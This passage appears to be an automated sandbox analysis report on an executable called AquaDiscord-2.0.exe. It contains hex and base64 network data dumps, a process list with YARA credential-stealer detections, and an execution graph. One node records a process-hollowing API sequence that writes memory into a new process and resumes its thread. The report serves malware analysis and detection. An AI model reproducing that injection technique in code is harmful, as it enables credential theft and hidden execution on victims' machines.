                                                                                        Data Ascii: SoWSZH4+Imz+547DPwbtnVpa4krlzXQiyCeJRl6D/ElJN6W1POyUjYlGfWLeVhxdCI/Q+QTrdML4Nz6X3tKZX41HwJaMzzXfD0SMlG91nEhqWHO5hiuHlu3GrfStg0x87JcTQT0u1Z4Mhkv1bVToqiov4w/GumSx2uCcRb8Triy5hZIV/Ez2jjlGHITuFOxtXe+0aaKaZGGtxu6jnjNtP8o0oqfeLafd/pc8FS/kWuy4CARJovgRIZqUzPOecd1
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 32 52 38 48 70 66 2f 65 55 63 76 4a 47 35 55 6d 46 6b 62 7a 32 42 62 68 35 6d 57 73 55 76 55 37 69 4f 39 70 6f 79 74 32 57 66 51 46 53 67 4e 6b 39 34 4e 52 34 37 58 62 68 66 4b 57 4d 6e 61 30 4f 73 55 75 49 55 68 53 64 66 70 4a 4b 6d 79 33 54 31 63 4e 35 41 55 6e 51 39 32 7a 50 38 45 72 70 54 39 52 6e 73 4a 53 6b 74 69 2b 4e 54 5a 70 31 4f 4c 68 34 31 57 44 51 50 74 66 69 79 57 49 6c 58 73 37 6e 63 4b 33 45 55 65 77 31 38 6e 2b 48 31 62 65 58 45 50 6c 49 6d 32 4a 39 6e 41 37 66 51 70 6c 73 39 70 47 44 52 78 51 62 39 49 64 68 2b 50 4a 6e 78 30 37 6c 53 59 57 52 76 50 59 46 75 48 6d 5a 61 6a 32 67 55 66 55 6c 30 78 62 6c 6b 6f 68 37 4f 56 48 61 79 6b 50 77 34 57 4c 2b 4d 70 45 59 74 4c 53 43 70 51 61 54 62 4c 56 74 4c 72 68 32 6c 6b 50 52 4f 5a 62 56 77 33
                                                                                        Data Ascii: 2R8Hpf/eUcvJG5UmFkbz2Bbh5mWsUvU7iO9poyt2WfQFSgNk94NR47XbhfKWMna0OsUuIUhSdfpJKmy3T1cN5AUnQ92zP8ErpT9RnsJSkti+NTZp1OLh41WDQPtfiyWIlXs7ncK3EUew18n+H1beXEPlIm2J9nA7fQpls9pGDRxQb9Idh+PJnx07lSYWRvPYFuHmZaj2gUfUl0xblkoh7OVHaykPw4WL+MpEYtLSCpQaTbLVtLrh2lkPROZbVw3
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 7a 55 37 35 34 30 44 48 53 4a 52 6c 74 5a 65 6a 39 30 48 37 49 5a 78 43 66 59 42 38 39 47 33 46 43 64 66 57 69 6a 31 4a 48 38 62 54 52 64 76 71 50 37 6f 32 30 32 36 54 6e 72 48 67 51 61 4e 64 67 46 5a 75 30 33 48 39 52 39 30 52 79 2b 79 49 63 51 52 6a 68 76 78 41 77 4a 42 50 75 48 66 55 53 62 6d 46 76 4c 77 38 67 58 4c 62 45 32 57 4f 56 73 56 30 35 68 50 73 37 36 35 64 42 55 48 4f 36 46 6a 38 6b 6b 65 34 4f 38 64 59 6f 35 4f 71 39 7a 75 69 53 49 34 58 4f 35 6c 45 37 45 50 2f 59 4f 48 65 6f 57 77 43 62 4e 76 4d 57 50 44 4b 51 62 6c 53 38 32 32 5a 76 5a 69 32 47 76 39 52 32 6b 6b 44 6e 30 6e 6a 5a 39 6c 76 31 2f 61 4e 5a 53 70 7a 31 38 6b 34 77 63 4a 41 33 6e 4c 54 41 49 76 56 69 76 6f 61 6e 55 54 41 45 51 53 4b 61 65 6c 69 2b 42 50 61 37 72 4a 6c 4a 6e 4b
                                                                                        Data Ascii: zU7540DHSJRltZej90H7IZxCfYB89G3FCdfWij1JH8bTRdvqP7o2026TnrHgQaNdgFZu03H9R90Ry+yIcQRjhvxAwJBPuHfUSbmFvLw8gXLbE2WOVsV05hPs765dBUHO6Fj8kke4O8dYo5Oq9zuiSI4XO5lE7EP/YOHeoWwCbNvMWPDKQblS822ZvZi2Gv9R2kkDn0njZ9lv1/aNZSpz18k4wcJA3nLTAIvVivoanUTAEQSKaeli+BPa7rJlJnK
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 2b 68 49 2b 31 44 33 51 62 48 58 75 37 77 31 6f 31 47 38 62 43 48 61 43 4f 46 72 35 54 37 43 6c 72 42 37 49 32 33 43 37 6d 6a 46 39 6c 71 39 5a 4e 56 7a 68 4b 32 38 2f 69 4c 35 55 35 39 6e 47 71 4a 78 78 46 6e 65 44 38 44 4d 73 48 49 30 52 64 33 32 51 4f 62 53 65 65 6c 33 33 45 36 6c 31 64 71 67 51 71 56 63 6e 46 51 35 6f 51 58 4d 50 66 38 41 31 4e 58 4a 58 52 39 2b 77 6f 31 46 31 4d 64 79 79 46 62 70 59 72 32 31 6a 71 59 4f 6d 6d 79 56 55 78 43 67 65 38 42 59 6e 52 33 68 37 6f 4e 48 41 6d 54 52 36 46 50 50 6e 57 65 39 56 50 42 35 75 35 79 65 72 44 43 71 63 71 31 6a 44 4c 38 49 78 45 7a 64 44 63 76 79 7a 6b 63 38 48 66 6e 73 54 63 44 4a 62 39 35 56 6b 56 69 2b 6b 62 75 6e 4a 37 41 71 69 6e 6b 56 6e 56 4c 6d 4f 35 73 78 79 74 4f 75 52 69 42 4e 67 73 70 7a
                                                                                        Data Ascii: +hI+1D3QbHXu7w1o1G8bCHaCOFr5T7ClrB7I23C7mjF9lq9ZNVzhK28/iL5U59nGqJxxFneD8DMsHI0Rd32QObSeel33E6l1dqgQqVcnFQ5oQXMPf8A1NXJXR9+wo1F1MdyyFbpYr21jqYOmmyVUxCge8BYnR3h7oNHAmTR6FPPnWe9VPB5u5yerDCqcq1jDL8IxEzdDcvyzkc8HfnsTcDJb95VkVi+kbunJ7AqinkVnVLmO5sxytOuRiBNgspz


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:14:39:58
                                                                                        Start date:30/12/2024
                                                                                        Path:C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\AquaDiscord-2.0.exe"
                                                                                        Imagebase:0xaf0000
                                                                                        File size:834'048 bytes
                                                                                        MD5 hash:A15EBBC7798933DC1D436B59600F3ACA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:14:39:58
                                                                                        Start date:30/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:14:39:59
                                                                                        Start date:30/12/2024
                                                                                        Path:C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\AquaDiscord-2.0.exe"
                                                                                        Imagebase:0xaf0000
                                                                                        File size:834'048 bytes
                                                                                        MD5 hash:A15EBBC7798933DC1D436B59600F3ACA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1737933383.0000000002E4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1747045883.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1737540016.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.1%
                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:28
                                                                                          execution_graph 20221 b05bb0 20222 b05bbb 20221->20222 20223 b05bcb 20221->20223 20227 b05cb5 20222->20227 20226 b05677 ___free_lconv_mon 14 API calls 20226->20223 20228 b05cd0 20227->20228 20229 b05cca 20227->20229 20231 b05677 ___free_lconv_mon 14 API calls 20228->20231 20230 b05677 ___free_lconv_mon 14 API calls 20229->20230 20230->20228 20232 b05cdc 20231->20232 20233 b05677 ___free_lconv_mon 14 API calls 20232->20233 20234 b05ce7 20233->20234 20235 b05677 ___free_lconv_mon 14 API calls 20234->20235 20236 b05cf2 20235->20236 20237 b05677 ___free_lconv_mon 14 API calls 20236->20237 20238 b05cfd 20237->20238 20239 b05677 ___free_lconv_mon 14 API calls 20238->20239 20240 b05d08 20239->20240 20241 b05677 ___free_lconv_mon 14 API calls 20240->20241 20242 b05d13 20241->20242 20243 b05677 ___free_lconv_mon 14 API calls 20242->20243 20244 b05d1e 20243->20244 20245 b05677 ___free_lconv_mon 14 API calls 20244->20245 20246 b05d29 20245->20246 20247 b05677 ___free_lconv_mon 14 API calls 20246->20247 20248 b05d37 20247->20248 20253 b05e2e 20248->20253 20254 b05e3a ___scrt_is_nonwritable_in_current_image 20253->20254 20269 b01cd1 EnterCriticalSection 20254->20269 20256 b05e6e 20270 b05e8d 20256->20270 20258 b05e44 20258->20256 20260 b05677 ___free_lconv_mon 14 API calls 20258->20260 20260->20256 20261 b05e99 20262 b05ea5 ___scrt_is_nonwritable_in_current_image 20261->20262 20274 b01cd1 EnterCriticalSection 20262->20274 20264 b05eaf 20265 b05bd1 _unexpected 14 API calls 20264->20265 20266 b05ec2 20265->20266 20275 b05ee2 20266->20275 20269->20258 20273 b01ce8 LeaveCriticalSection 20270->20273 20272 b05d5d 20272->20261 20273->20272 20274->20264 20278 b01ce8 LeaveCriticalSection 20275->20278 20277 b05bc3 20277->20226 20278->20277 18617 af70b0 18622 af8e3d 18617->18622 18619 af70c3 18626 af7254 18619->18626 18623 af8e49 __EH_prolog3 18622->18623 18629 af8d67 18623->18629 18625 af8e9b std::ios_base::_Init 18625->18619 18697 af7269 18626->18697 18638 af7f3f 18629->18638 18631 af8d72 18646 af6bd0 18631->18646 18633 af8d85 18634 af4df0 std::ios_base::_Init 39 API calls 18633->18634 18636 af8d9f 18633->18636 18634->18636 18635 af8dab 18635->18625 18636->18635 18650 af9d8d 18636->18650 18639 af7f4b __EH_prolog3 18638->18639 18640 af4df0 std::ios_base::_Init 39 API calls 18639->18640 18641 af7f7c 18640->18641 18642 af7113 std::ios_base::_Init 3 API calls 18641->18642 18643 af7f83 18642->18643 18645 af7f94 std::ios_base::_Init 18643->18645 18655 af77b2 18643->18655 18645->18631 18647 af6c17 18646->18647 18648 af3180 68 API calls 18647->18648 18649 af6c2d std::ios_base::_Ios_base_dtor 18648->18649 18649->18633 18651 af74a4 std::_Lockit::_Lockit 7 API calls 18650->18651 18652 af9d9b 18651->18652 18653 af74d5 std::_Lockit::~_Lockit 2 API calls 18652->18653 18654 af9dd6 18653->18654 18654->18635 18656 af77be __EH_prolog3 18655->18656 18657 af74a4 std::_Lockit::_Lockit 7 API calls 18656->18657 18658 af77c9 18657->18658 18659 af77fa 18658->18659 18667 af76af 18658->18667 18661 af74d5 std::_Lockit::~_Lockit 2 API calls 18659->18661 18663 af7837 std::ios_base::_Init 18661->18663 18662 af77dc 18673 af7845 18662->18673 18663->18645 18668 af7113 std::ios_base::_Init 3 API calls 18667->18668 18669 af76ba 18668->18669 18670 af76ce 18669->18670 18681 af7743 18669->18681 18670->18662 18674 af7851 18673->18674 18676 af77e4 18673->18676 18684 af9c34 18674->18684 18677 af7630 18676->18677 18678 af763e 18677->18678 18680 af764a ___std_exception_copy codecvt 18677->18680 18679 b02a1e std::locale::_Locimp::~_Locimp 14 API calls 18678->18679 18678->18680 18679->18680 18680->18659 18682 af7630 _Yarn 14 API calls 18681->18682 18683 af76cc 18682->18683 18683->18662 18685 b01f43 18684->18685 18686 af9c44 EncodePointer 18684->18686 18687 b07aa0 CallUnexpected 2 API calls 18685->18687 18686->18676 18688 b01f48 18687->18688 18689 b01f53 18688->18689 18690 b07ac7 CallUnexpected 39 API calls 18688->18690 18691 b01f5d IsProcessorFeaturePresent 18689->18691 18692 b01f7c 18689->18692 18690->18689 18693 b01f69 18691->18693 18694 aff14f CallUnexpected 21 API calls 18692->18694 18695 b01a20 CallUnexpected 8 API calls 18693->18695 18696 b01f86 18694->18696 18695->18692 18698 af727f 18697->18698 18699 af7278 18697->18699 18706 b00fbb 18698->18706 18703 b0102c 18699->18703 18702 af70cd 18704 b00fbb std::ios_base::_Init 32 API calls 18703->18704 18705 b0103e 18704->18705 18705->18702 18709 b0121e 18706->18709 18710 b0122a ___scrt_is_nonwritable_in_current_image 18709->18710 18717 b01cd1 EnterCriticalSection 18710->18717 18712 b01238 18718 b01042 18712->18718 18714 b01245 18728 b0126d 18714->18728 18717->18712 18719 b0105d 18718->18719 18720 b010d0 std::_Lockit::_Lockit 18718->18720 18719->18720 18721 b010b0 18719->18721 18722 b0c025 std::ios_base::_Init 32 API calls 18719->18722 18720->18714 18721->18720 18723 b0c025 std::ios_base::_Init 32 API calls 18721->18723 18724 b010a6 18722->18724 18725 b010c6 18723->18725 18727 b05677 ___free_lconv_mon 14 API calls 18724->18727 18726 b05677 ___free_lconv_mon 14 API calls 18725->18726 18726->18720 18727->18721 18731 b01ce8 LeaveCriticalSection 18728->18731 18730 b00fec 18730->18702 18731->18730 20424 af51b0 20425 af51cf 20424->20425 20426 af51f7 20424->20426 20430 af5350 20425->20430 20434 af5400 20426->20434 20428 af51ef 20431 af539a std::ios_base::_Init 20430->20431 20438 af54f0 20431->20438 20435 af5447 std::ios_base::_Init 20434->20435 20436 af54f0 std::ios_base::_Init 30 API calls 20435->20436 20437 af547c 20436->20437 20437->20428 20451 af56f0 20438->20451 20442 af552f std::ios_base::_Init 20443 af56f0 std::ios_base::_Init 5 API calls 20442->20443 20448 af5568 std::ios_base::_Init 20442->20448 20444 af55c2 20443->20444 20458 af5810 20444->20458 20449 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20448->20449 20450 af53b9 20449->20450 20450->20428 20452 af570b std::ios_base::_Init 20451->20452 20453 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20452->20453 20454 af551d 20453->20454 20454->20442 20455 af5770 20454->20455 20465 af7934 20455->20465 20459 af583e std::ios_base::_Init 20458->20459 20460 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20459->20460 20461 af55d9 20460->20461 20462 af58b0 20461->20462 20479 af5950 20462->20479 20470 af79cd 20465->20470 20468 afa41c Concurrency::cancel_current_task RaiseException 20469 af7953 20468->20469 20473 af6780 20470->20473 20474 af67c1 std::invalid_argument::invalid_argument 20473->20474 20475 afaa1d ___std_exception_copy 29 API calls 20474->20475 20476 af67e0 20475->20476 20477 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20476->20477 20478 af67ea 20477->20478 20478->20468 20482 af5970 20479->20482 20483 af5987 std::ios_base::_Init 20482->20483 20486 af2ae0 20483->20486 20487 af2aff 20486->20487 20488 af2af3 20486->20488 20489 af2b1f 20487->20489 20490 af2b0c 20487->20490 20488->20448 20501 af2bf0 20489->20501 20493 af2b80 20490->20493 20494 af2b9e 20493->20494 20495 af2ba3 20493->20495 20504 af2c10 20494->20504 20497 af2bf0 std::ios_base::_Init 3 API calls 20495->20497 20498 af2bae 20497->20498 20499 af2bbb 20498->20499 20508 b019cf 20498->20508 20499->20488 20502 af7113 std::ios_base::_Init 3 API calls 20501->20502 20503 af2c02 20502->20503 20503->20488 20505 af2c28 std::ios_base::_Init 20504->20505 20506 afa41c Concurrency::cancel_current_task RaiseException 20505->20506 20507 af2c3d 20506->20507 20509 b01c0e __strnicoll 29 API calls 20508->20509 20510 b019de 20509->20510 20511 b019ec __Getctype 11 API calls 20510->20511 20512 b019eb 20511->20512 18744 af8ab0 18745 af8abf 18744->18745 18747 af8ae3 18745->18747 18748 b0300b 18745->18748 18749 b0301e _Fputc 18748->18749 18752 b03078 18749->18752 18751 b03033 _Fputc 18751->18747 18753 b0308a 18752->18753 18754 b030ad 18752->18754 18755 b01b68 _Fputc 29 API calls 18753->18755 18754->18753 18757 b030d4 18754->18757 18756 b030a5 18755->18756 18756->18751 18760 b031ae 18757->18760 18761 b031ba ___scrt_is_nonwritable_in_current_image 18760->18761 18768 afd0ff EnterCriticalSection 18761->18768 18763 b031c8 18769 b0310e 18763->18769 18765 b031d5 18778 b031fd 18765->18778 18768->18763 18770 b021a8 ___scrt_uninitialize_crt 64 API calls 18769->18770 18771 b03129 18770->18771 18781 b07f5d 18771->18781 18774 b069b4 _unexpected 14 API calls 18775 b03172 18774->18775 18776 b05677 ___free_lconv_mon 14 API calls 18775->18776 18777 b0314e 18776->18777 18777->18765 18785 afd113 LeaveCriticalSection 18778->18785 18780 b0310c 18780->18751 18782 b07f74 18781->18782 18783 b03133 18781->18783 18782->18783 18784 b05677 ___free_lconv_mon 14 API calls 18782->18784 18783->18774 18783->18777 18784->18783 18785->18780 16803 b2019e 16808 b201d4 16803->16808 16804 b20321 GetPEB 16805 b20333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16804->16805 16806 b203da WriteProcessMemory 16805->16806 16805->16808 16807 b2041f 16806->16807 16809 b20461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16807->16809 16810 b20424 WriteProcessMemory 16807->16810 16808->16804 16808->16805 16810->16807 20622 b075c0 20625 b01ce8 LeaveCriticalSection 20622->20625 20624 b075c7 20625->20624 19320 af8a20 19321 af8a42 19320->19321 19325 af8a57 19320->19325 19326 af8bb5 19321->19326 19329 af8bd0 19326->19329 19331 af8c21 19326->19331 19327 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19328 af8a47 19327->19328 19328->19325 19332 b02a39 19328->19332 19330 b02a74 69 API calls 19329->19330 19329->19331 19330->19331 19331->19327 19333 b02a44 19332->19333 19334 b02a59 19332->19334 19335 b012d4 __dosmaperr 14 API calls 19333->19335 19334->19333 19336 b02a60 19334->19336 19337 b02a49 19335->19337 19342 b01384 19336->19342 19339 b019bf __strnicoll 29 API calls 19337->19339 19341 b02a54 19339->19341 19340 b02a6f 19340->19325 19341->19325 19343 b01397 _Fputc 19342->19343 19346 b015fd 19343->19346 19345 b013ac _Fputc 19345->19340 19348 b01609 ___scrt_is_nonwritable_in_current_image 19346->19348 19347 b0160f 19349 b01b68 _Fputc 29 API calls 19347->19349 19348->19347 19351 b01652 19348->19351 19350 b0162a 19349->19350 19350->19345 19357 afd0ff EnterCriticalSection 19351->19357 19353 b0165e 19358 b01511 19353->19358 19355 b01674 19369 b0169d 19355->19369 19357->19353 19359 b01524 19358->19359 19360 b01537 19358->19360 19359->19355 19372 b01438 19360->19372 19362 b0155a 19363 b01575 19362->19363 19368 b015e8 19362->19368 19376 b0c32c 19362->19376 19365 b021a8 ___scrt_uninitialize_crt 64 API calls 19363->19365 19366 b01588 19365->19366 19390 b0c112 19366->19390 19368->19355 19441 afd113 LeaveCriticalSection 19369->19441 19371 b016a5 19371->19350 19373 b01449 19372->19373 19375 b014a1 19372->19375 19373->19375 19393 b0c0d2 19373->19393 19375->19362 19377 b0c6fe 19376->19377 19378 b0c735 19377->19378 19379 b0c70d 19377->19379 19381 b08e04 _Ungetc 29 API calls 19378->19381 19380 b01b68 _Fputc 29 API calls 19379->19380 19382 b0c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19380->19382 19383 b0c73e 19381->19383 19382->19363 19403 b0c130 19383->19403 19386 b0c7e8 19406 b0c388 19386->19406 19388 b0c7ff 19388->19382 19418 b0c533 19388->19418 19391 b0c273 _Fputc 31 API calls 19390->19391 19392 b0c12b 19391->19392 19392->19368 19394 b0c0e6 _Fputc 19393->19394 19397 b0c273 19394->19397 19396 b0c0fb _Fputc 19396->19375 19398 b0cd8f _Fputc 29 API calls 19397->19398 19399 b0c285 19398->19399 19400 b0c2a1 SetFilePointerEx 19399->19400 19402 b0c28d _Fputc 19399->19402 19401 b0c2b9 GetLastError 19400->19401 19400->19402 19401->19402 19402->19396 19425 b0c14e 19403->19425 19407 b0c397 _Fputc 19406->19407 19408 b08e04 _Ungetc 29 API calls 19407->19408 19409 b0c3b3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19408->19409 19412 b0c130 33 API calls 19409->19412 19417 b0c3bf 19409->19417 19410 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19411 b0c531 19410->19411 19411->19382 19413 b0c413 19412->19413 19414 b0c445 ReadFile 19413->19414 19413->19417 19415 b0c46c 19414->19415 19414->19417 19416 b0c130 33 API calls 19415->19416 19416->19417 19417->19410 19419 b08e04 _Ungetc 29 API calls 19418->19419 19420 b0c546 19419->19420 19421 b0c590 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19420->19421 19422 b0c130 33 API calls 19420->19422 19421->19382 19423 b0c5ed 19422->19423 19423->19421 19424 b0c130 33 API calls 19423->19424 19424->19421 19426 b0c15a ___scrt_is_nonwritable_in_current_image 19425->19426 19427 b0c19d 19426->19427 19429 b0c1e3 19426->19429 19435 b0c149 19426->19435 19428 b01b68 _Fputc 29 API calls 19427->19428 19428->19435 19436 b0cfd8 EnterCriticalSection 19429->19436 19431 b0c1e9 19432 b0c20a 19431->19432 19433 b0c273 _Fputc 31 API calls 19431->19433 19437 b0c26b 19432->19437 19433->19432 19435->19382 19435->19386 19435->19388 19436->19431 19440 b0cffb LeaveCriticalSection 19437->19440 19439 b0c271 19439->19435 19440->19439 19441->19371 19506 afd200 19507 b0213a ___scrt_uninitialize_crt 68 API calls 19506->19507 19508 afd208 19507->19508 19516 b07eb2 19508->19516 19510 afd20d 19511 b07f5d 14 API calls 19510->19511 19512 afd21c DeleteCriticalSection 19511->19512 19512->19510 19513 afd237 19512->19513 19514 b05677 ___free_lconv_mon 14 API calls 19513->19514 19515 afd242 19514->19515 19517 b07ebe ___scrt_is_nonwritable_in_current_image 19516->19517 19526 b01cd1 EnterCriticalSection 19517->19526 19519 b07f35 19531 b07f54 19519->19531 19521 b07ec9 19521->19519 19523 b07f09 DeleteCriticalSection 19521->19523 19527 b01f92 19521->19527 19524 b05677 ___free_lconv_mon 14 API calls 19523->19524 19524->19521 19526->19521 19528 b01fa5 _Fputc 19527->19528 19534 b02050 19528->19534 19530 b01fb1 _Fputc 19530->19521 19606 b01ce8 LeaveCriticalSection 19531->19606 19533 b07f41 19533->19510 19535 b0205c ___scrt_is_nonwritable_in_current_image 19534->19535 19536 b02066 19535->19536 19537 b02089 19535->19537 19538 b01b68 _Fputc 29 API calls 19536->19538 19544 b02081 19537->19544 19545 afd0ff EnterCriticalSection 19537->19545 19538->19544 19540 b020a7 19546 b01fc2 19540->19546 19542 b020b4 19560 b020df 19542->19560 19544->19530 19545->19540 19547 b01ff2 19546->19547 19548 b01fcf 19546->19548 19550 b01fea 19547->19550 19551 b021a8 ___scrt_uninitialize_crt 64 API calls 19547->19551 19549 b01b68 _Fputc 29 API calls 19548->19549 19549->19550 19550->19542 19552 b0200a 19551->19552 19553 b07f5d 14 API calls 19552->19553 19554 b02012 19553->19554 19555 b08e04 _Ungetc 29 API calls 19554->19555 19556 b0201e 19555->19556 19563 b0d0d6 19556->19563 19559 b05677 ___free_lconv_mon 14 API calls 19559->19550 19605 afd113 LeaveCriticalSection 19560->19605 19562 b020e5 19562->19544 19564 b0d0ff 19563->19564 19569 b02025 19563->19569 19565 b0d14e 19564->19565 19567 b0d126 19564->19567 19566 b01b68 _Fputc 29 API calls 19565->19566 19566->19569 19570 b0d179 19567->19570 19569->19550 19569->19559 19571 b0d185 ___scrt_is_nonwritable_in_current_image 19570->19571 19578 b0cfd8 EnterCriticalSection 19571->19578 19573 b0d193 19574 b0d1c4 19573->19574 19579 b0d036 19573->19579 19592 b0d1fe 19574->19592 19578->19573 19580 b0cd8f _Fputc 29 API calls 19579->19580 19581 b0d046 19580->19581 19582 b0d04c 19581->19582 19584 b0d07e 19581->19584 19585 b0cd8f _Fputc 29 API calls 19581->19585 19595 b0cdf9 19582->19595 19584->19582 19586 b0cd8f _Fputc 29 API calls 19584->19586 19587 b0d075 19585->19587 19588 b0d08a CloseHandle 19586->19588 19589 b0cd8f _Fputc 29 API calls 19587->19589 19588->19582 19590 b0d096 GetLastError 19588->19590 19589->19584 19590->19582 19591 b0d0a4 _Fputc 19591->19574 19604 b0cffb LeaveCriticalSection 19592->19604 19594 b0d1e7 19594->19569 19596 b0ce08 19595->19596 19597 b0ce6f 19595->19597 19596->19597 19603 b0ce32 19596->19603 19598 b012d4 __dosmaperr 14 API calls 19597->19598 19599 b0ce74 19598->19599 19600 b012e7 __dosmaperr 14 API calls 19599->19600 19601 b0ce5f 19600->19601 19601->19591 19602 b0ce59 SetStdHandle 19602->19601 19603->19601 19603->19602 19604->19594 19605->19562 19606->19533 19643 b07001 19644 b0701c ___scrt_is_nonwritable_in_current_image 19643->19644 19655 b01cd1 EnterCriticalSection 19644->19655 19646 b07023 19656 b0cf3a 19646->19656 19653 b07152 2 API calls 19654 b07041 19653->19654 19675 b07067 19654->19675 19655->19646 19657 b0cf46 ___scrt_is_nonwritable_in_current_image 19656->19657 19658 b0cf70 19657->19658 19659 b0cf4f 19657->19659 19678 b01cd1 EnterCriticalSection 19658->19678 19661 b012d4 __dosmaperr 14 API calls 19659->19661 19662 b0cf54 19661->19662 19663 b019bf __strnicoll 29 API calls 19662->19663 19664 b07032 19663->19664 19664->19654 19669 b0709c GetStartupInfoW 19664->19669 19665 b0cfa8 19686 b0cfcf 19665->19686 19666 b0cf7c 19666->19665 19679 b0ce8a 19666->19679 19670 b070b9 19669->19670 19671 b0703c 19669->19671 19670->19671 19672 b0cf3a 30 API calls 19670->19672 19671->19653 19673 b070e1 19672->19673 19673->19671 19674 b07111 GetFileType 19673->19674 19674->19673 19695 b01ce8 LeaveCriticalSection 19675->19695 19677 b07052 19678->19666 19680 b069b4 _unexpected 14 API calls 19679->19680 19682 b0ce9c 19680->19682 19681 b0cea9 19683 b05677 ___free_lconv_mon 14 API calls 19681->19683 19682->19681 19689 b06430 19682->19689 19685 b0cefe 19683->19685 19685->19666 19694 b01ce8 LeaveCriticalSection 19686->19694 19688 b0cfd6 19688->19664 19690 b066cd std::_Lockit::_Lockit 5 API calls 19689->19690 19691 b0644c 19690->19691 19692 b0646a InitializeCriticalSectionAndSpinCount 19691->19692 19693 b06455 19691->19693 19692->19693 19693->19682 19694->19688 19695->19677 16811 afa112 16812 afa11e ___scrt_is_nonwritable_in_current_image 16811->16812 16837 af737a 16812->16837 16814 afa125 16815 afa27e 16814->16815 16825 afa14f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16814->16825 16873 af9a33 IsProcessorFeaturePresent 16815->16873 16817 afa285 16855 aff139 16817->16855 16820 aff14f CallUnexpected 21 API calls 16821 afa293 16820->16821 16822 afa16e 16823 afa1ef 16848 b016ac 16823->16848 16825->16822 16825->16823 16858 aff183 16825->16858 16827 afa1f5 16852 af20c0 FreeConsole 16827->16852 16830 af99e0 CallUnexpected GetModuleHandleW 16831 afa216 16830->16831 16831->16817 16832 afa21a 16831->16832 16833 afa223 16832->16833 16864 aff165 16832->16864 16867 af73b3 16833->16867 16838 af7383 16837->16838 16877 af969b IsProcessorFeaturePresent 16838->16877 16842 af7394 16843 af7398 16842->16843 16887 afd060 16842->16887 16843->16814 16846 af73af 16846->16814 16849 b016b5 16848->16849 16850 b016ba 16848->16850 16959 b017d5 16849->16959 16850->16827 17826 af20b0 16852->17826 16856 aff284 CallUnexpected 21 API calls 16855->16856 16857 afa28b 16856->16857 16857->16820 16859 aff199 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 16858->16859 16859->16823 16860 b0590a _unexpected 39 API calls 16859->16860 16863 b038bc 16860->16863 16861 b01f43 CallUnexpected 39 API calls 16862 b038e6 16861->16862 16863->16861 16865 aff284 CallUnexpected 21 API calls 16864->16865 16866 aff170 16865->16866 16866->16833 16868 af73bf 16867->16868 16869 af73d5 16868->16869 18237 afd072 16868->18237 16869->16822 16871 af73cd 16872 afab0e ___scrt_uninitialize_crt 7 API calls 16871->16872 16872->16869 16874 af9a49 std::invalid_argument::invalid_argument CallUnexpected 16873->16874 16875 af9af4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16874->16875 16876 af9b38 CallUnexpected 16875->16876 16876->16817 16878 af738f 16877->16878 16879 afaaef 16878->16879 16896 b05346 16879->16896 16882 afaaf8 16882->16842 16884 afab00 16885 afab0b 16884->16885 16910 b05382 16884->16910 16885->16842 16950 b079e9 16887->16950 16890 afab0e 16891 afab17 16890->16891 16892 afab21 16890->16892 16893 b04404 ___vcrt_uninitialize_ptd 6 API calls 16891->16893 16892->16843 16894 afab1c 16893->16894 16895 b05382 ___vcrt_uninitialize_locks DeleteCriticalSection 16894->16895 16895->16892 16897 b0534f 16896->16897 16899 b05378 16897->16899 16900 afaaf4 16897->16900 16914 b0f629 16897->16914 16901 b05382 